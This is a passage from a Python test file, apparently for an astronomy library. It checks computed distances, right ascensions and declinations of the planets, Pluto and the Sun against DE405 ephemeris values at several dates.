compare(dec.degrees, 5.32829157368082, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 1.1615415906820667, 0.001 * ra_arcsecond)
compare(dec.degrees, 5.326768071513868, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 1.1534174784892788, 0.001 * ra_arcsecond)
compare(dec.degrees, 5.277365365528824, 0.001 * arcsecond)
def test_venus_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.venus(jd)).position.au)
compare(distance * OLD_AU, 1.1376890757925104, 0.5 * meter)
astrometric = e.observe(de405.venus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 15.993350650200568, 0.001 * ra_arcsecond)
compare(dec.degrees, -18.451653207795236, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 15.993038357924485, 0.001 * ra_arcsecond)
compare(dec.degrees, -18.450881488018126, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.992790109710333, 0.001 * ra_arcsecond)
compare(dec.degrees, -18.44871897642583, 0.001 * arcsecond)
def test_venus_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.venus(jd)).position.au)
compare(distance * OLD_AU, 0.7824924286112764, 0.5 * meter)
astrometric = e.observe(de405.venus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 7.175585125577371, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.874130272238094, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 7.175312328808404, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.87477997549141, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 7.188033727750362, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.85167856390226, 0.001 * arcsecond)
def test_venus_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.venus(jd)).position.au)
compare(distance * OLD_AU, (0.9646045654448725, 1.0711674186789975, 1.1376890757925104, 0.7824924286112764), 0.5 * meter)
astrometric = e.observe(de405.venus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (4.966946050917652, 1.161811406279447, 15.993350650200568, 7.175585125577371), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.210417323471006, 5.32829157368082, -18.451653207795236, 19.874130272238094), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (4.966656139420439, 1.1615415906820667, 15.993038357924485, 7.175312328808404), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.210145917097474, 5.326768071513868, -18.450881488018126, 19.87477997549141), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (4.93668626355443, 1.1534174784892788, 15.992790109710333, 7.188033727750362), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.166644671858105, 5.277365365528824, -18.44871897642583, 19.85167856390226), 0.001 * arcsecond)
def test_mars_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.mars(jd)).position.au)
compare(distance * OLD_AU, 0.5912188976380217, 0.5 * meter)
astrometric = e.observe(de405.mars)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 16.0296606272219, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.127310308581468, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 16.02988433983068, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.128202621801755, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.99950982315885, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.046277103674843, 0.001 * arcsecond)
def test_mars_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.mars(jd)).position.au)
compare(distance * OLD_AU, 1.430250679602913, 0.5 * meter)
astrometric = e.observe(de405.mars)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 23.545034875459514, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.8822490432210355, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 23.544892038854186, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.88299363089811, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 23.536847630733252, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.935089760397492, 0.001 * arcsecond)
def test_mars_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.mars(jd)).position.au)
compare(distance * OLD_AU, 1.8496039270835372, 0.5 * meter)
astrometric = e.observe(de405.mars)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 22.034936616343344, 0.001 * ra_arcsecond)
compare(dec.degrees, -13.18070741103498, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 22.03468760932384, 0.001 * ra_arcsecond)
compare(dec.degrees, -13.182134899635477, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 22.034417492807563, 0.001 * ra_arcsecond)
compare(dec.degrees, -13.182689288940116, 0.001 * arcsecond)
def test_mars_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.mars(jd)).position.au)
compare(distance * OLD_AU, 1.7665523168668773, 0.5 * meter)
astrometric = e.observe(de405.mars)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 13.894324196598355, 0.001 * ra_arcsecond)
compare(dec.degrees, -12.122808318928707, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 13.894132382683363, 0.001 * ra_arcsecond)
compare(dec.degrees, -12.121796956140246, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 13.9057161859901, 0.001 * ra_arcsecond)
compare(dec.degrees, -12.184654273116957, 0.001 * arcsecond)
def test_mars_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.mars(jd)).position.au)
compare(distance * OLD_AU, (0.5912188976380217, 1.430250679602913, 1.8496039270835372, 1.7665523168668773), 0.5 * meter)
astrometric = e.observe(de405.mars)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (16.0296606272219, 23.545034875459514, 22.034936616343344, 13.894324196598355), 0.001 * ra_arcsecond)
compare(dec.degrees, (-24.127310308581468, -4.8822490432210355, -13.18070741103498, -12.122808318928707), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (16.02988433983068, 23.544892038854186, 22.03468760932384, 13.894132382683363), 0.001 * ra_arcsecond)
compare(dec.degrees, (-24.128202621801755, -4.88299363089811, -13.182134899635477, -12.121796956140246), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (15.99950982315885, 23.536847630733252, 22.034417492807563, 13.9057161859901), 0.001 * ra_arcsecond)
compare(dec.degrees, (-24.046277103674843, -4.935089760397492, -13.182689288940116, -12.184654273116957), 0.001 * arcsecond)
def test_jupiter_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.jupiter(jd)).position.au)
compare(distance * OLD_AU, 5.8416003192317465, 0.5 * meter)
astrometric = e.observe(de405.jupiter)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 12.104091505864654, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.6513409058207986, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.103936313614676, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.6524656208782568, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 12.07798204538282, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.8216129394812305, 0.001 * arcsecond)
def test_jupiter_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.jupiter(jd)).position.au)
compare(distance * OLD_AU, 5.913287883102948, 0.5 * meter)
astrometric = e.observe(de405.jupiter)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 6.765154678701348, 0.001 * ra_arcsecond)
compare(dec.degrees, 23.170397700122013, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 6.764854244708427, 0.001 * ra_arcsecond)
compare(dec.degrees, 23.170736332068763, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 6.755383083025232, 0.001 * ra_arcsecond)
compare(dec.degrees, 23.182684693676578, 0.001 * arcsecond)
def test_jupiter_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.jupiter(jd)).position.au)
compare(distance * OLD_AU, 4.621126565890217, 0.5 * meter)
astrometric = e.observe(de405.jupiter)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 1.5913207023268698, 0.001 * ra_arcsecond)
compare(dec.degrees, 8.595887646396902, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 1.5914167941833441, 0.001 * ra_arcsecond)
compare(dec.degrees, 8.59631203599914, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 1.5911888424331277, 0.001 * ra_arcsecond)
compare(dec.degrees, 8.594250857972387, 0.001 * arcsecond)
def test_jupiter_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.jupiter(jd)).position.au)
compare(distance * OLD_AU, 5.129958529243068, 0.5 * meter)
astrometric = e.observe(de405.jupiter)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 4.822841055032964, 0.001 * ra_arcsecond)
compare(dec.degrees, 21.649994488649476, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 4.822764769132736, 0.001 * ra_arcsecond)
compare(dec.degrees, 21.64994169521302, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 4.835670404865468, 0.001 * ra_arcsecond)
compare(dec.degrees, 21.67058638943795, 0.001 * arcsecond)
def test_jupiter_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.jupiter(jd)).position.au)
compare(distance * OLD_AU, (5.8416003192317465, 5.913287883102948, 4.621126565890217, 5.129958529243068), 0.5 * meter)
astrometric = e.observe(de405.jupiter)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (12.104091505864654, 6.765154678701348, 1.5913207023268698, 4.822841055032964), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.6513409058207986, 23.170397700122013, 8.595887646396902, 21.649994488649476), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.103936313614676, 6.764854244708427, 1.5914167941833441, 4.822764769132736), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.6524656208782568, 23.170736332068763, 8.59631203599914, 21.64994169521302), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (12.07798204538282, 6.755383083025232, 1.5911888424331277, 4.835670404865468), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.8216129394812305, 23.182684693676578, 8.594250857972387, 21.67058638943795), 0.001 * arcsecond)
def test_saturn_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.saturn(jd)).position.au)
compare(distance * OLD_AU, 9.382032444401025, 0.5 * meter)
astrometric = e.observe(de405.saturn)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 2.4627748852420206, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.045819985925936, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.462707593703528, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.045735497802628, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.4352879582290177, 0.001 * ra_arcsecond)
compare(dec.degrees, 11.9115661075769, 0.001 * arcsecond)
def test_saturn_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.saturn(jd)).position.au)
compare(distance * OLD_AU, 9.420484451056101, 0.5 * meter)
astrometric = e.observe(de405.saturn)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 19.814248756112033, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.933390198050763, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 19.81446344451556, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.932846451357463, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 19.805277718955743, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.958164640919687, 0.001 * arcsecond)
def test_saturn_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.saturn(jd)).position.au)
compare(distance * OLD_AU, 8.652750126001484, 0.5 * meter)
astrometric = e.observe(de405.saturn)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 2.584400980536592, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.616288735770384, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.584593321351076, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.616983167644802, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.584361121508456, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.614774672730574, 0.001 * arcsecond)
def test_saturn_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.saturn(jd)).position.au)
compare(distance * OLD_AU, 10.326368974662916, 0.5 * meter)
astrometric = e.observe(de405.saturn)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 13.628484577191722, 0.001 * ra_arcsecond)
compare(dec.degrees, -7.659435207931653, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 13.62827504244793, 0.001 * ra_arcsecond)
compare(dec.degrees, -7.658028344724226, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 13.639628746850631, 0.001 * ra_arcsecond)
compare(dec.degrees, -7.723201642102626, 0.001 * arcsecond)
def test_saturn_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.saturn(jd)).position.au)
compare(distance * OLD_AU, (9.382032444401025, 9.420484451056101, 8.652750126001484, 10.326368974662916), 0.5 * meter)
astrometric = e.observe(de405.saturn)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (2.4627748852420206, 19.814248756112033, 2.584400980536592, 13.628484577191722), 0.001 * ra_arcsecond)
compare(dec.degrees, (12.045819985925936, -20.933390198050763, 12.616288735770384, -7.659435207931653), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (2.462707593703528, 19.81446344451556, 2.584593321351076, 13.62827504244793), 0.001 * ra_arcsecond)
compare(dec.degrees, (12.045735497802628, -20.932846451357463, 12.616983167644802, -7.658028344724226), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (2.4352879582290177, 19.805277718955743, 2.584361121508456, 13.639628746850631), 0.001 * ra_arcsecond)
compare(dec.degrees, (11.9115661075769, -20.958164640919687, 12.614774672730574, -7.723201642102626), 0.001 * arcsecond)
def test_uranus_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.uranus(jd)).position.au)
compare(distance * OLD_AU, 18.75197906203834, 0.5 * meter)
astrometric = e.observe(de405.uranus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 12.087167068351334, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.20723926118363256, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.087010426255667, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.20832526777272883, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 12.061052547705433, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.37749969290358576, 0.001 * arcsecond)
def test_uranus_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.uranus(jd)).position.au)
compare(distance * OLD_AU, 18.622417009295177, 0.5 * meter)
astrometric = e.observe(de405.uranus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 18.668551452013403, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.437331340689163, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.668859170516964, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.437016930580615, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.65936113308538, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.447681812488984, 0.001 * arcsecond)
def test_uranus_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.uranus(jd)).position.au)
compare(distance * OLD_AU, 20.727159134679393, 0.5 * meter)
astrometric = e.observe(de405.uranus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 21.165586867541418, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.018831731314233, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 21.165269485049027, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.020267168405784, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 21.164987614252272, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.020320613172004, 0.001 * arcsecond)
def test_uranus_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.uranus(jd)).position.au)
compare(distance * OLD_AU, 19.234768680195387, 0.5 * meter)
astrometric = e.observe(de405.uranus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 0.4891643148564316, 0.001 * ra_arcsecond)
compare(dec.degrees, 2.3565095329111823, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 0.4894463256538988, 0.001 * ra_arcsecond)
compare(dec.degrees, 2.358369638516312, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 0.5005500654503398, 0.001 * ra_arcsecond)
compare(dec.degrees, 2.429779341040803, 0.001 * arcsecond)
def test_uranus_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.uranus(jd)).position.au)
compare(distance * OLD_AU, (18.75197906203834, 18.622417009295177, 20.727159134679393, 19.234768680195387), 0.5 * meter)
astrometric = e.observe(de405.uranus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (12.087167068351334, 18.668551452013403, 21.165586867541418, 0.4891643148564316), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.20723926118363256, -23.437331340689163, -17.018831731314233, 2.3565095329111823), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.087010426255667, 18.668859170516964, 21.165269485049027, 0.4894463256538988), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.20832526777272883, -23.437016930580615, -17.020267168405784, 2.358369638516312), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (12.061052547705433, 18.65936113308538, 21.164987614252272, 0.5005500654503398), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.37749969290358576, -23.447681812488984, -17.020320613172004, 2.429779341040803), 0.001 * arcsecond)
def test_neptune_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.neptune(jd)).position.au)
compare(distance * OLD_AU, 29.83221264621946, 0.5 * meter)
astrometric = e.observe(de405.neptune)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 15.637210587139663, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.67999613660563, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 15.63739098768298, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.68045373026462, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.608486730597075, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.583793285519313, 0.001 * arcsecond)
def test_neptune_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.neptune(jd)).position.au)
compare(distance * OLD_AU, 29.490001740438892, 0.5 * meter)
astrometric = e.observe(de405.neptune)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 19.03623522579387, 0.001 * ra_arcsecond)
compare(dec.degrees, -21.792864018500975, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 19.036513633320563, 0.001 * ra_arcsecond)
compare(dec.degrees, -21.79251066237039, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 19.02716408230529, 0.001 * ra_arcsecond)
compare(dec.degrees, -21.808047913986808, 0.001 * arcsecond)
def test_neptune_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.neptune(jd)).position.au)
compare(distance * OLD_AU, 31.024491920354496, 0.5 * meter)
astrometric = e.observe(de405.neptune)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 20.362841834121518, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.21242523937633, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 20.362475439010588, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.213645950878377, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 20.36218815756048, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.21323379889766, 0.001 * arcsecond)
def test_neptune_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.neptune(jd)).position.au)
compare(distance * OLD_AU, 28.984118029716345, 0.5 * meter)
astrometric = e.observe(de405.neptune)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 22.252468120719442, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.504657215501584, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 22.252825961036415, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.50264948264589, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 22.2643158309744, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.437330191299896, 0.001 * arcsecond)
def test_neptune_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.neptune(jd)).position.au)
compare(distance * OLD_AU, (29.83221264621946, 29.490001740438892, 31.024491920354496, 28.984118029716345), 0.5 * meter)
astrometric = e.observe(de405.neptune)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (15.637210587139663, 19.03623522579387, 20.362841834121518, 22.252468120719442), 0.001 * ra_arcsecond)
compare(dec.degrees, (-17.67999613660563, -21.792864018500975, -19.21242523937633, -11.504657215501584), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (15.63739098768298, 19.036513633320563, 20.362475439010588, 22.252825961036415), 0.001 * ra_arcsecond)
compare(dec.degrees, (-17.68045373026462, -21.79251066237039, -19.213645950878377, -11.50264948264589), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (15.608486730597075, 19.02716408230529, 20.36218815756048, 22.2643158309744), 0.001 * ra_arcsecond)
compare(dec.degrees, (-17.583793285519313, -21.808047913986808, -19.21323379889766, -11.437330191299896), 0.001 * arcsecond)
def test_pluto_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.pluto(jd)).position.au)
compare(distance * OLD_AU, 32.312971776632494, 0.5 * meter)
astrometric = e.observe(de405.pluto)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 12.015311208821212, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.620557180992588, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.01514128380381, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.622990160668607, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 11.989232654068259, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.792242650891875, 0.001 * arcsecond)
def test_pluto_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.pluto(jd)).position.au)
compare(distance * OLD_AU, 28.707485955458118, 0.5 * meter)
astrometric = e.observe(de405.pluto)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 15.216302246424346, 0.001 * ra_arcsecond)
compare(dec.degrees, -1.3346560528819575, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 15.216661036271791, 0.001 * ra_arcsecond)
compare(dec.degrees, -1.3358630622052712, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.208581663980876, 0.001 * ra_arcsecond)
compare(dec.degrees, -1.3022394883151638, 0.001 * arcsecond)
def test_pluto_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.pluto(jd)).position.au)
compare(distance * OLD_AU, 31.064412196006614, 0.5 * meter)
astrometric = e.observe(de405.pluto)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 16.761873062250743, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.39643313463007, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 16.761526675406767, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.396301545071504, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 16.761277438459963, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.39428873441123, 0.001 * arcsecond)
def test_pluto_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.pluto(jd)).position.au)
compare(distance * OLD_AU, 31.69909782133193, 0.5 * meter)
astrometric = e.observe(de405.pluto)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 18.488351288595236, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.55219099488885, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.488573622605898, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.551729414764313, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.501338273669152, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.541227909743732, 0.001 * arcsecond)
def test_pluto_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.pluto(jd)).position.au)
compare(distance * OLD_AU, (32.312971776632494, 28.707485955458118, 31.064412196006614, 31.69909782133193), 0.5 * meter)
astrometric = e.observe(de405.pluto)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (12.015311208821212, 15.216302246424346, 16.761873062250743, 18.488351288595236), 0.001 * ra_arcsecond)
compare(dec.degrees, (16.620557180992588, -1.3346560528819575, -11.39643313463007, -19.55219099488885), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.01514128380381, 15.216661036271791, 16.761526675406767, 18.488573622605898), 0.001 * ra_arcsecond)
compare(dec.degrees, (16.622990160668607, -1.3358630622052712, -11.396301545071504, -19.551729414764313), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (11.989232654068259, 15.208581663980876, 16.761277438459963, 18.501338273669152), 0.001 * ra_arcsecond)
compare(dec.degrees, (16.792242650891875, -1.3022394883151638, -11.39428873441123, -19.541227909743732), 0.001 * arcsecond)
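
# The Sun and Moon checks that follow reuse the same geocentric pattern as
# the planets above.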
def test_sun_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.sun(jd)).position.au)
compare(distance * OLD_AU, 1.0160878650466754, 0.5 * meter)
astrometric = e.observe(de405.sun)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 8.03008088792976, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.496475643233936, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
